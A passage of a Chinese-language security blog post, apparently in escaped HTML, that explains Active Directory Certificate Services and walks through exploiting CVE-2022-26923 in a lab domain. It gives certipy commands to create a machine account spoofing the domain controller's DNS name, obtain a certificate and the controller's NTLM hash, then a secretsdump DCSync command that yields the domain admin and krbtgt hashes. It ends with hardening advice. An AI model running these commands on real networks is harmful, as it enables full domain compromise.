Infrastructure\uff09\u53ef\u80fd\u4f1a\u589e\u52a0\u590d\u6742\u6027\u548c\u5f00\u9500\u3002&lt;\/li&gt;\n&lt;li&gt;&lt;strong&gt;\u4f9d\u8d56\u4e8e\u8bc1\u4e66&lt;\/strong&gt;\uff1a\u8bc1\u4e66\u7684\u8fc7\u671f\u3001\u64a4\u9500\u6216\u5176\u4ed6\u95ee\u9898\u53ef\u80fd\u4f1a\u5bfc\u81f4\u8eab\u4efd\u9a8c\u8bc1\u5931\u8d25\u3002&lt;\/li&gt;\n&lt;\/ul&gt;\n&lt;p&gt;\u603b\u4e4b\uff0cPKINIT\u4e3aKerberos\u63d0\u4f9b\u4e86\u4e00\u4e2a\u66f4\u5b89\u5168\u7684\u8eab\u4efd\u9a8c\u8bc1\u65b9\u6cd5\uff0c\u5c24\u5176\u662f\u5f53\u7ed3\u5408\u4f7f\u7528\u667a\u80fd\u5361\u65f6\u3002&lt;\/p&gt;\n&lt;h3&gt;4\u3001\u8bc1\u4e66\u6a21\u677f&lt;\/h3&gt;\n&lt;p&gt;\u8bc1\u4e66\u6a21\u677fCertificate Templates\u662fCA\u8bc1\u4e66\u9881\u53d1\u673a\u6784\u7684\u4e00\u4e2a\u7ec4\u6210\u90e8\u5206\uff0c\u662f\u8bc1\u4e66\u7b56\u7565\u4e2d\u7684\u91cd\u8981\u5143\u7d20\uff0c\u662f\u7528\u4e8e\u8bc1\u4e66\u6ce8\u518c\u3001\u4f7f\u7528\u548c\u7ba1\u7406\u7684\u4e00\u7ec4\u89c4\u5219\u548c\u683c\u5f0f\u3002\u5f53CA\u6536\u5230\u5bf9\u8bc1\u4e66\u7684\u8bf7\u6c42\u65f6\uff0c\u5fc5\u987b\u5bf9\u8be5\u8bf7\u6c42\u5e94\u7528\u4e00\u7ec4\u89c4\u5219\u548c\u8bbe\u7f6e\uff0c\u4ee5\u6267\u884c\u6240\u8bf7\u6c42\u7684\u529f\u80fd\uff0c\u4f8b\u5982\u8bc1\u4e66\u9881\u53d1\u6216\u66f4\u65b0\u3002\u8fd9\u4e9b\u89c4\u5219\u53ef\u4ee5\u662f\u7b80\u5355\u7684\uff0c\u4e5f\u53ef\u4ee5\u662f\u590d\u6742\u7684\uff0c\u4e5f\u53ef\u4ee5\u9002\u7528\u4e8e\u6240\u6709\u7528\u6237\u6216\u7279\u5b9a\u7684\u7528\u6237\u7ec4\u3002\u8bc1\u4e66\u6a21\u677f\u662f\u5728CA\u4e0a\u914d\u7f6e\u5e76\u5e94\u7528\u4e8e\u4f20\u5165\u8bc1\u4e66\u8bf7\u6c42\u7684\u4e00\u7ec4\u89c4\u5219\u548c\u8bbe\u7f6e\u3002\u8bc1\u4e66\u6a21\u677f\u8fd8\u5411\u5ba2\u6237\u673a\u63d0\u4f9b\u4e86\u5173\u4e8e\u5982\u4f55\u521b\u5efa\u548c\u63d0\u4ea4\u6709\u6548\u7684\u8bc1\u4e66\u8bf7\u6c42\u7684\u8bf4\u660e\u3002\u57fa\u4e8e\u8bc1\u4e66\u6a21\u677f\u7684\u8bc1\u4e66\u53ea\u80fd\u7531\u4f01\u4e1aCA\u9881\u53d1\u3002\u8fd9\u4e9b\u6a21\u677f\u5b58\u50a8\u5728\u6d3b\u52a8\u76ee\u5f55\u57df\u670d\u52a1(ADDS)\u4e2d\uff0c\u4ee5\u4f9b\u6797\u4e2d\u7684\u6bcf\u4e2aCA\u4f7f\u7528\u3002\u8fd9\u5141\u8bb8CA\u59cb\u7ec8\u80fd\u591f\u8bbf\u95ee\u5f53\u524d\u6807\u51c6\u6a21\u677f\uff0c\u5e76\u786e\u4fdd\u8de8\u6797\u4e00\u81f4\u7684\u5e94\u7528\u3002&lt;\/p&gt;\n&lt;p&gt;\u8bc1\u4e66\u6a21\u677f\u901a\u8fc7\u5141\u8bb8\u7ba1\u7406\u5458\u53d1\u5e03\u5df2\u4e3a\u9009\u5b9a\u4efb\u52a1\u9884\u5148\u914d\u7f6e\u7684\u8bc1\u4e66\uff0c\u53ef\u4ee5\u5927\u5927\u7b80\u5316\u7ba1\u7406\u8bc1\u4e66\u9881\u53d1\u673a\u6784(CA)\u7684\u4efb\u52a1\u3002\u8bc1\u4e66\u6a21\u677f\u7ba1\u7406\u5355\u5143\u5141\u8bb8\u7ba1\u7406\u5458\u6267\u884c\u4ee5\u4e0b\u4efb\u52a1\uff1a&lt;\/p&gt;\n&lt;ul&gt;\n&lt;li&gt;\u67e5\u770b\u6bcf\u4e2a\u8bc1\u4e66\u6a21\u677f\u7684\u5c5e\u6027&lt;\/li&gt;\n&lt;li&gt;\u590d\u5236\u548c\u4fee\u6539\u8bc1\u4e66\u6a21\u677f&lt;\/li&gt;\n&lt;li&gt;\u63a7\u5236\u54ea\u4e9b\u7528\u6237\u548c\u8ba1\u7b97\u673a\u53ef\u4ee5\u8bfb\u53d6\u6a21\u677f\u5e76\u6ce8\u518c\u8bc1\u4e66&lt;\/li&gt;\n&lt;li&gt;\u6267\u884c\u4e0e\u8bc1\u4e66\u6a21\u677f\u76f8\u5173\u7684\u5176\u4ed6\u7ba1\u7406\u4efb\u52a1&lt;\/li&gt;\n&lt;\/ul&gt;\n&lt;p&gt;&lt;img src=&quot;http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a3e9eb.&quot; alt=&quot;&quot; \/&gt;&lt;\/p&gt;\n&lt;h3&gt;5\u3001\u8bc1\u4e66\u6ce8\u518c&lt;\/h3&gt;\n&lt;p&gt;\u4e0d\u540c\u6743\u9650\u7684\u57df\u7528\u6237\uff0c\u5728\u6ce8\u518c\u8bc1\u4e66\u65f6\uff0c\u53ea\u80fd\u6ce8\u518c\u5bf9\u5e94\u7684\u6a21\u677f\uff0c\u5728\u8bc1\u4e66\u6a21\u677f\u7684\u5b89\u5168\u5c5e\u6027\u4e2d\uff0c\u53ef\u4ee5\u770b\u5230\u54ea\u4e9b\u7528\u6237\u548c\u7ec4\u5177\u6709\u5f53\u524d\u8bc1\u4e66\u6a21\u677f\u7684\u6ce8\u518c\u6743\u9650\uff0c\u4e00\u4e2a\u8bc1\u4e66\u6ce8\u518c\u6d41\u7a0b\u5982\u4e0b\uff1a&lt;\/p&gt;\n&lt;p&gt;&lt;img src=&quot;http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a4b572.&quot; alt=&quot;&quot; \/&gt;&lt;\/p&gt;\n&lt;ul&gt;\n&lt;li&gt;\n&lt;p&gt;\u5ba2\u6237\u7aef\u751f\u6210\u4e00\u5bf9\u516c\u3001\u79c1\u94a5&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;\u5ba2\u6237\u7aef\u751f\u6210\u8bc1\u4e66\u7b7e\u540d\u8bf7\u6c42(CSR\uff0cCertificate Signing Request)\uff0c\u91cc\u9762\u5305\u542b\u5ba2\u6237\u7aef\u751f\u6210\u7684\u516c\u94a5\u4ee5\u53ca\u8bf7\u6c42\u7684\u8bc1\u4e66\u6a21\u677f\u3001\u8bf7\u6c42\u7684\u4e3b\u4f53\u7b49\u4fe1\u606f\u3002\u6574\u4e2aCSR\u7528\u5ba2\u6237\u7aef\u7684\u79c1\u94a5\u7b7e\u540d\uff0c\u53d1\u9001\u7ed9CA\u3002&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;CA\u6536\u5230\u8bf7\u6c42\u540e\uff0c\u4ece\u4e2d\u53d6\u51fa\u516c\u94a5\u5bf9CSR\u8fdb\u884c\u7b7e\u540d\u6821\u9a8c\u3002\u6821\u9a8c\u901a\u8fc7\u540e\u5224\u65ad\u5ba2\u6237\u7aef\u8bf7\u6c42\u7684\u8bc1\u4e66\u6a21\u677f\u662f\u5426\u5b58\u5728\uff0c\u5982\u679c\u5b58\u5728\uff0c\u6839\u636e\u8bc1\u4e66\u6a21\u677f\u4e2d\u7684\u5c5e\u6027\u5224\u65ad\u8bf7\u6c42\u7684\u4e3b\u4f53\u662f\u5426\u6709\u6743\u9650\u7533\u8bf7\u8be5\u8bc1\u4e66\u3002\u5982\u679c\u6709\u6743\u9650\uff0c\u5219\u8fd8\u8981\u6839\u636e\u5176\u4ed6\u5c5e\u6027\uff0c\u5982\uff1a\u53d1\u5e03\u8981\u6c42\u3001\u4f7f\u7528\u8005\u540d\u79f0\u3001\u6269\u5c55\u6765\u751f\u6210\u8bc1\u4e66\u3002&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;CA\u4f7f\u7528\u5176\u79c1\u94a5\u7b7e\u540d\u751f\u6210\u7684\u8bc1\u4e66\u5e76\u53d1\u9001\u7ed9\u5ba2\u6237\u7aef\u3002&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;\u5ba2\u6237\u7aef\u5b58\u50a8\u8be5\u8bc1\u4e66\u5728\u7cfb\u7edf\u4e2d\u3002&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;\/ul&gt;\n&lt;p&gt;\u5982\u679c\u5728\u5b89\u88c5ADCS\u670d\u52a1\u7684\u65f6\u5019\uff0c\u52fe\u9009\u4e86\u201c\u8bc1\u4e66\u9881\u53d1\u673a\u6784Web\u6ce8\u518c\u201d\u9009\u9879\uff0c\u90a3\u4e48\u5219\u53ef\u4ee5\u901a\u8fc7Web\u65b9\u5f0f\u6765\u7533\u8bf7\u8bc1\u4e66\uff0c\u5982\u679c\u8bc1\u4e66\u7533\u8bf7\u7684Web\u9875\u9762\u652f\u6301NTLM\u8ba4\u8bc1\uff08\u9ed8\u8ba4\u652f\u6301\uff09\uff0c\u5219\u53ef\u80fd\u88abNTLM\u4e2d\u7ee7\u653b\u51fb:&lt;\/p&gt;\n&lt;p&gt;&lt;img src=&quot;http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a5cf95.&quot; alt=&quot;&quot; \/&gt;&lt;\/p&gt;\n&lt;p&gt;\u901a\u8fc7\u57df\u8d26\u53f7\u8ba4\u8bc1\u540e\u767b\u9646\uff1a&lt;\/p&gt;\n&lt;p&gt;&lt;img src=&quot;http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a66baa.&quot; alt=&quot;&quot; \/&gt;&lt;\/p&gt;\n&lt;h4&gt;\uff081\uff09\u666e\u901a\u57df\u8d26\u53f7\u6ce8\u518c\u8bc1\u4e66&lt;\/h4&gt;\n&lt;p&gt;\u666e\u901a\u57df\u8d26\u53f7\u7533\u8bf7\u8bc1\u4e66\u65f6\uff0cADCS\u670d\u52a1\u5668\u901a\u8fc7userPrincipalName\u6216sAMAccountName\u5c5e\u6027\u67e5\u627e\u5bf9\u5e94\u7528\u6237\uff0c\u5e76\u8fd4\u56dePAC\u548c\u7528\u6237Hash\uff0c\u800c\u8fd9\u4e24\u4e2a\u5c5e\u6027\u5728\u57df\u5185\u662f\u552f\u4e00\u7684\uff0c\u6240\u4ee5\u6574\u4e2a\u6d41\u7a0b\u53ef\u786e\u4fdd\u4e00\u4e00\u5bf9\u5e94\u5173\u7cfb\uff1a&lt;\/p&gt;\n&lt;p&gt;&lt;img src=&quot;http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a70f2a.&quot; alt=&quot;&quot; \/&gt;&lt;\/p&gt;\n&lt;h4&gt;\uff082\uff09\u8ba1\u7b97\u673a\u8d26\u53f7\u6ce8\u518c\u8bc1\u4e66&lt;\/h4&gt;\n&lt;ul&gt;\n&lt;li&gt;\n&lt;p&gt;\u8ba1\u7b97\u673a\u8d26\u53f7\u5728\u6ca1\u6709\u8bbe\u7f6edNSHostName\u5c5e\u6027\u65f6\uff0cADCS\u670d\u52a1\u5668\u65e0\u6cd5\u5224\u65ad\u8bf7\u6c42\u673a\u5668\u7684\u8eab\u4efd\uff0c\u56e0\u6b64\u65e0\u6cd5\u751f\u6210\u8bc1\u4e66&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;\u8ba1\u7b97\u673a\u8d26\u53f7\u8bbe\u7f6edNSHostName\u4e86\u5c5e\u6027\u65f6\uff0cADCS\u670d\u52a1\u5668\u6839\u636edNSHostName\u5c5e\u6027\u7684\u503c\u6765\u751f\u6210\u5bf9\u5e94\u8bc1\u4e66\uff0c\u5728\u6574\u4e2aADCS\u670d\u52a1\u5668\u751f\u6210\u673a\u5668\u8bc1\u4e66\u7684\u8fc7\u7a0b\u4e2d\uff0c\u53ea\u6709dNSHostName\u5c5e\u6027\u5f71\u54cd\u4e86\u8bc1\u4e66\u6240\u5c5e\u673a\u5668\u7684\u751f\u6210\u3002&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;KDC\u5728\u6536\u5230\u673a\u5668\u8d26\u53f7PKINIT Kerberos\u8ba4\u8bc1\u65f6\uff0cKDC\u4f1a\u53d6\u51fa\u8bc1\u4e66\u4e2d\u201c\u4f7f\u7528\u8005\u53ef\u9009\u540d\u79f0\u201d\u4e2dDNS Name\u7684\u503c\uff0c\u7136\u540e\u67e5\u8be2sAMAccountName\u5c5e\u6027\u5bf9\u5e94\u7684\u6761\u76ee\uff0c\u7528\u8be5\u6761\u76ee\u7684\u6743\u9650\u751f\u6210PAC\uff0c\u5728\u8fd9\u4e2a\u8fc7\u7a0b\u5e76\u4e0d\u4f1a\u641c\u7d22\u548c\u6821\u9a8cdNSHostName\u5c5e\u6027\u3002&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;\u56e0\u6b64\u53ea\u6709dNSHostName\u5c5e\u6027\u5f71\u54cdADCS\u670d\u52a1\u5668\u751f\u6210\u5bf9\u5e94\u673a\u5668\u7684\u8bc1\u4e66\uff0c\u5e76\u4e14\u5728\u57df\u5185dNSHostName\u5c5e\u6027\u5e76\u4e0d\u5177\u6709\u552f\u4e00\u6027\uff0c\u56e0\u6b64\u53ef\u4ee5\u5229\u7528\u666e\u901a\u57df\u7528\u6237\u521b\u5efa\u4e00\u4e2a\u65b0\u7684\u8ba1\u7b97\u673a\u8d26\u53f7\uff0c\u7136\u540e\u4fee\u6539\u8be5\u8ba1\u7b97\u673a\u8d26\u53f7\u7684dNSHostName\u5c5e\u6027\u4e3a\u57df\u63a7\u8ba1\u7b97\u673a\u8d26\u53f7\u540d\uff0c\u8fd9\u6837\u901a\u8fc7\u65b0\u6dfb\u52a0\u7684\u8ba1\u7b97\u673a\u8d26\u53f7\u7533\u8bf7\u8bc1\u4e66\uff0c\u5c31\u53ef\u4ee5\u6b3a\u9a97ADCS\u8fd4\u56de\u57df\u63a7\u8ba1\u7b97\u673a\u8d26\u53f7\u7684NTLM\u54c8\u5e0c&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;\/ul&gt;\n&lt;p&gt;&lt;img src=&quot;http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a7a2be.&quot; alt=&quot;&quot; \/&gt;&lt;\/p&gt;\n&lt;h2&gt;\u4e8c\u3001\u5229\u7528\u6761\u4ef6&lt;\/h2&gt;\n&lt;ul&gt;\n&lt;li&gt;\n&lt;p&gt;\u57df\u63a7\u5b89\u88c5\u4e86\u8bc1\u4e66\u670d\u52a1&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;\u5177\u6709\u4e00\u4e2a\u6709\u6743\u9650\u6dfb\u52a0\u8ba1\u7b97\u673a\u8d26\u53f7\u7684\u57df\u8d26\u53f7\uff0c\u9ed8\u8ba4\u60c5\u51b5\u4e0b\u6bcf\u4e2a\u666e\u901a\u57df\u8d26\u53f7\u6709\u6dfb\u52a010\u4e2a\u8ba1\u7b97\u673a\u8d26\u53f7\u7684\u6743\u9650&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;\u8ba1\u7b97\u673a\u8d26\u53f7\u5177\u6709\u7533\u8bf7\u8ba1\u7b97\u673a\u6a21\u677f\u8bc1\u4e66\u6743\u9650\uff0c\u9ed8\u8ba4\u60c5\u51b5\u4e0b\u5177\u6709\u8fd9\u4e2a\u6743\u9650&lt;br \/&gt;\n&lt;img src=&quot;http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a8a7fe.&quot; alt=&quot;&quot; \/&gt;&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;CVE-2022-26923\u8865\u4e01\u6ca1\u6253&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;\u65e0\u8bba\u662f\u5426\u5f00\u542f\u4e86\u8bc1\u4e66Web\u6ce8\u518c\u63a5\u53e3\u90fd\u53ef\u4ee5\u6253\uff0c\u56e0\u4e3a\u901a\u8fc7rpc\u4e5f\u53ef\u4ee5\u6ce8\u518c\u8bc1\u4e66&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;\/ul&gt;\n&lt;h2&gt;\u4e09\u3001\u5229\u7528\u8fc7\u7a0b&lt;\/h2&gt;\n&lt;p&gt;&lt;strong&gt;\u6d4b\u8bd5\u73af\u5883\uff1a&lt;\/strong&gt;&lt;\/p&gt;\n&lt;table&gt;\n&lt;thead&gt;\n&lt;tr&gt;\n&lt;th&gt;\u4e3b\u673a\u540d&lt;\/th&gt;\n&lt;th&gt;\u4e3b\u673aIP&lt;\/th&gt;\n&lt;th&gt;\u4e3b\u673a\u8d26\u6237&lt;\/th&gt;\n&lt;th&gt;\u4e3b\u673a\u63cf\u8ff0&lt;\/th&gt;\n&lt;\/tr&gt;\n&lt;\/thead&gt;\n&lt;tbody&gt;\n&lt;tr&gt;\n&lt;td&gt;dc-main-1.qiuqiu.com&lt;\/td&gt;\n&lt;td&gt;10.10.10.10&lt;\/td&gt;\n&lt;td&gt;qiuqiu.com\\domain_admin&lt;\/td&gt;\n&lt;td&gt;\u4e3b\u57df&lt;\/td&gt;\n&lt;\/tr&gt;\n&lt;tr&gt;\n&lt;td&gt;user1.qiuqiu.com&lt;\/td&gt;\n&lt;td&gt;10.100.0.6&lt;\/td&gt;\n&lt;td&gt;qiuqiu.com\\yefan&lt;\/td&gt;\n&lt;td&gt;\u666e\u901a\u57df\u5185\u673a\u5668\uff0c\u88ab\u653b\u51fb\u8005\u63a7\u5236&lt;\/td&gt;\n&lt;\/tr&gt;\n&lt;\/tbody&gt;\n&lt;\/table&gt;\n&lt;h3&gt;1\u3001\u5b9a\u4f4dADCS\u670d\u52a1\u4ee5\u53caCA\u6839\u8bc1\u4e66&lt;\/h3&gt;\n&lt;p&gt;\u83b7\u53d6\u5230ADCS\u670d\u52a1\u5668\u5730\u5740\u4e3a&lt;code&gt;dc-main-1.qiuqiu.com&lt;\/code&gt;\uff0cCA\u6839\u8bc1\u4e66\u540d\u4e3a&lt;code&gt;qiuqiu-DC-MAIN-1-CA&lt;\/code&gt;&lt;\/p&gt;\n&lt;pre&gt;&lt;code&gt;certutil -dump -v&lt;\/code&gt;&lt;\/pre&gt;\n&lt;p&gt;&lt;img src=&quot;http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a943c8.&quot; alt=&quot;&quot; \/&gt;&lt;\/p&gt;\n&lt;p&gt;\u5982\u679c\u653b\u51fb\u8005\u5728\u57df\u5916\uff0c\u53ef\u4ee5\u4f7f\u7528&lt;code&gt;certipy&lt;\/code&gt;\u5de5\u5177\u5b9a\u4f4d\uff0c\u9664\u4e86\u660e\u6587\u8d26\u5bc6\uff0c\u4e5f\u652f\u6301PTH\u65b9\u5f0f\u8ba4\u8bc1\uff1a&lt;\/p&gt;\n&lt;pre&gt;&lt;code&gt;\/\/ pip\u5b89\u88c5\npip3 install certipy-ad\n\ncertipy find -u yefan@qiuqiu.com -p Test1234 -dc-ip 10.10.10.10 -debug&lt;\/code&gt;&lt;\/pre&gt;\n&lt;p&gt;&lt;img src=&quot;http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a9dd35.&quot; alt=&quot;&quot; \/&gt;&lt;\/p&gt;\n&lt;h3&gt;2\u3001\u521b\u5efa\u8ba1\u7b97\u673a\u8d26\u53f7\u5e76\u8bbe\u7f6ednshostname\u5c5e\u6027&lt;\/h3&gt;\n&lt;pre&gt;&lt;code&gt;certipy account create -u yefan@qiuqiu.com -p Test1234 -dc-ip 10.10.10.10 -user &quot;fake_cert&quot; -pass Test1234 -dns dc-main-1.qiuqiu.com -debug&lt;\/code&gt;&lt;\/pre&gt;\n&lt;p&gt;&lt;img src=&quot;http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27aa6211.&quot; alt=&quot;&quot; \/&gt;&lt;\/p&gt;\n&lt;p&gt;\u53ef\u4ee5\u5728\u57df\u63a7\u4e0a\u770b\u5230\uff0c\u65b0\u6dfb\u52a0\u7684\u8ba1\u7b97\u673a\u8d26\u53f7\uff0cdnshostname\u5b57\u6bb5\u4e0e\u5f53\u524d\u8d26\u53f7\u540d\u4e0d\u5339\u914d\uff1a&lt;\/p&gt;\n&lt;p&gt;&lt;img src=&quot;http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27aaf67a.&quot; alt=&quot;&quot; \/&gt;&lt;\/p&gt;\n&lt;h3&gt;3\u3001\u4f7f\u7528\u8ba1\u7b97\u673a\u8d26\u53f7\u7533\u8bf7\u8ba1\u7b97\u673a\u6a21\u677f\u8bc1\u4e66&lt;\/h3&gt;\n&lt;p&gt;\u4f7f\u7528\u4e4b\u524d\u65b0\u521b\u5efa\u7684\u8ba1\u7b97\u673a\u8d26\u53f7\u8ba4\u8bc1\uff0c\u5e76\u4f7f\u7528ADCS\u4e2d\u7684CA\u6839\u8bc1\u4e66\u4e3a\u5f53\u524d\u8ba1\u7b97\u673a\u8d26\u53f7\u7b7e\u53d1\u4e00\u4e2a\u8ba1\u7b97\u673a\u6a21\u677f\u7684\u8bc1\u4e66\uff0c\u53ef\u4ee5\u770b\u5230\uff0c\u5f53\u8bc1\u4e66\u7533\u8bf7\u6210\u529f\u540e\uff0c\u8fd4\u56de\u7684dnshostname\u5b57\u6bb5\u4e3a\u57df\u63a7\u8ba1\u7b97\u673a\u8d26\u53f7\uff1a&lt;\/p&gt;\n&lt;pre&gt;&lt;code&gt;certipy req -u fake_cert$ -p Test1234 -dc-ip 10.10.10.10 -ca qiuqiu-DC-MAIN-1-CA -template Machine -debug&lt;\/code&gt;&lt;\/pre&gt;\n&lt;p&gt;&lt;img src=&quot;http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27ab9e63.&quot; alt=&quot;&quot; \/&gt;&lt;\/p&gt;\n&lt;p&gt;\u5728\u57df\u63a7\u4e0a\u53ef\u4ee5\u770b\u5230\u65b0\u9881\u53d1\u7684\u8ba1\u7b97\u673a\u8d26\u53f7\u8bc1\u4e66\uff1a&lt;\/p&gt;\n&lt;p&gt;&lt;img src=&quot;http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27ac2d3d.&quot; alt=&quot;&quot; \/&gt;&lt;\/p&gt;\n&lt;h3&gt;4\u3001\u4f7f\u7528\u8bc1\u4e66\u8fdb\u884ckerberos\u8ba4\u8bc1\u5e76\u83b7\u5f97\u5bf9\u5e94\u7528\u6237\u7684NTLM\u54c8\u5e0c&lt;\/h3&gt;\n&lt;p&gt;\u4f7f\u7528\u8ba1\u7b97\u673a\u8d26\u53f7\u8bc1\u4e66\u901a\u8fc7kerberos\u8ba4\u8bc1\u540e\uff0c\u4f1a\u8fd4\u56de\u5bf9\u5e94\u7528\u6237\u7684TGT\u7968\u636e\uff0c\u5728TGT\u4e2d\u7684PAC\u4e2d\uff0c\u5305\u542b\u4e86\u7528\u6237\u7684NTLM\u54c8\u5e0c&lt;\/p&gt;\n&lt;pre&gt;&lt;code&gt;certipy auth -pfx dc-main-1.pfx -dc-ip 10.10.10.10 -debug&lt;\/code&gt;&lt;\/pre&gt;\n&lt;p&gt;&lt;img src=&quot;http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27acb407.&quot; alt=&quot;&quot; \/&gt;&lt;\/p&gt;\n&lt;h3&gt;5\u3001dcsync\u57df\u63a7hash&lt;\/h3&gt;\n&lt;pre&gt;&lt;code&gt;secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:6ccc4c07fe69157e48976165a273b13b &quot;qiuqiu.com\/dc-main-1$@10.10.10.10&quot;&lt;\/code&gt;&lt;\/pre&gt;\n&lt;p&gt;&lt;img src=&quot;http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27ad4a32.&quot; alt=&quot;&quot; \/&gt;&lt;\/p&gt;\n&lt;p&gt;\u83b7\u53d6\u5230\u57df\u7ba1\u4ee5\u53cakrbtgt\u8d26\u53f7\u7684hash\uff0c\u540e\u7eed\u5229\u7528\u4e0d\u518d\u8d58\u8ff0\u3002&lt;\/p&gt;\n&lt;h2&gt;\u56db\u3001\u52a0\u56fa\u65b9\u6848&lt;\/h2&gt;\n&lt;ul&gt;\n&lt;li&gt;\n&lt;p&gt;\u7981\u7528\u666e\u901a\u57df\u7528\u6237\u521b\u5efa\u8ba1\u7b97\u673a\u8d26\u53f7&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;\u5982\u65e0\u9700\u8981\uff0c\u7981\u7528\u666e\u901a\u57df\u7528\u6237\uff0c\u4ee5\u53ca\u8ba1\u7b97\u673a\u8d26\u53f7\u521b\u5efa\u8bc1\u4e66&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;\u6253\u8865\u4e01&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;\/ul&gt;\n<\/div><div class=\"gfmr-markdown-rendered\"><h2><span class=\"ez-toc-section\" id=\"%E4%B8%80%E3%80%81%E8%83%8C%E6%99%AF%E7%9F%A5%E8%AF%86\"><\/span>\u4e00\u3001\u80cc\u666f\u77e5\u8bc6<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<h3><span class=\"ez-toc-section\" id=\"1%E3%80%81PKI%E5%85%AC%E9%92%A5%E5%9F%BA%E7%A1%80%E8%AE%BE%E6%96%BD\"><\/span>1\u3001PKI\u516c\u94a5\u57fa\u7840\u8bbe\u65bd<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>PKI\uff08Public Key Infrastructure\uff09\u516c\u94a5\u57fa\u7840\u8bbe\u65bd\uff0c\u662f\u63d0\u4f9b\u516c\u94a5\u52a0\u5bc6\u548c\u6570\u5b57\u7b7e\u540d\u670d\u52a1\u7684\u7cfb\u7edf\u6216\u5e73\u53f0\uff0c\u662f\u4e00\u4e2a\u5305\u62ec\u786c\u4ef6\u3001\u8f6f\u4ef6\u3001\u4eba\u5458\u3001\u7b56\u7565\u548c\u89c4\u7a0b\u7684\u96c6\u5408\uff0c\u7528\u6765\u5b9e\u73b0\u57fa\u4e8e\u516c\u94a5\u5bc6\u7801\u4f53\u5236\u7684\u5bc6\u94a5\u548c\u8bc1\u4e66\u7684\u4ea7\u751f\u3001\u7ba1\u7406\u3001\u5b58\u50a8\u3001\u5206\u53d1\u548c\u64a4\u9500\u7b49\u529f\u80fd\u3002\u4f01\u4e1a\u901a\u8fc7\u91c7\u7528 PKI \u6846\u67b6\u7ba1\u7406\u5bc6\u94a5\u548c\u8bc1\u4e66\u53ef\u4ee5\u5efa\u7acb\u4e00\u4e2a\u5b89\u5168\u7684\u7f51\u7edc\u73af\u5883\u3002<\/p>\n<p>PKI\u7684\u57fa\u7840\u6280\u672f\u5305\u62ec\uff1a\u516c\u94a5\u52a0\u5bc6\u3001\u6570\u5b57\u7b7e\u540d\u3001\u6570\u636e\u5b8c\u6574\u6027\u673a\u5236\u3001\u6570\u5b57\u4fe1\u5c01(\u6df7\u5408\u52a0\u5bc6)\u3001\u53cc\u91cd\u6570\u5b57\u7b7e\u540d\u7b49\u3002<\/p>\n<p>PKI\u4f53\u7cfb\u80fd\u591f\u5b9e\u73b0\u7684\u529f\u80fd\u6709\uff1a<\/p>\n<ul>\n<li>\u8eab\u4efd\u9a8c\u8bc1<\/li>\n<li>\u6570\u636e\u5b8c\u6574\u6027<\/li>\n<li>\u6570\u636e\u673a\u5bc6\u6027<\/li>\n<li>\u64cd\u4f5c\u7684\u4e0d\u53ef\u5426\u8ba4\u6027<\/li>\n<\/ul>\n<p>\u5fae\u8f6f\u7684\u6d3b\u52a8\u76ee\u5f55\u8bc1\u4e66\u670d\u52a1<strong>ADCS\u5c31\u662f\u5bf9PKI\u7684\u5b9e\u73b0<\/strong>\uff0c\u6d3b\u52a8\u76ee\u5f55\u8bc1\u4e66\u670d\u52a1\u80fd\u591f\u8ddf\u73b0\u6709\u7684\u6d3b\u52a8\u76ee\u5f55\u57df\u670d\u52a1ADDS\u8fdb\u884c\u7ed3\u5408\uff0c\u53ef\u4ee5\u7528\u4e8e\u8eab\u4efd\u9a8c\u8bc1\u3001\u516c\u94a5\u52a0\u5bc6\u548c\u6570\u5b57\u7b7e\u540d\u7b49\u3002ADCS\u63d0\u4f9b\u6240\u6709\u4e0ePKI\u76f8\u5173\u7684\u7ec4\u4ef6\u4f5c\u4e3a\u89d2\u8272\u670d\u52a1\u3002\u6bcf\u4e2a\u89d2\u8272\u670d\u52a1\u8d1f\u8d23\u8bc1\u4e66\u57fa\u7840\u67b6\u6784\u7684\u7279\u5b9a\u90e8\u5206\uff0c\u540c\u65f6\u534f\u540c\u5de5\u4f5c\u4ee5\u5f62\u6210\u5b8c\u6574\u7684\u89e3\u51b3\u65b9\u6848\u3002<\/p>\n<h3><span class=\"ez-toc-section\" 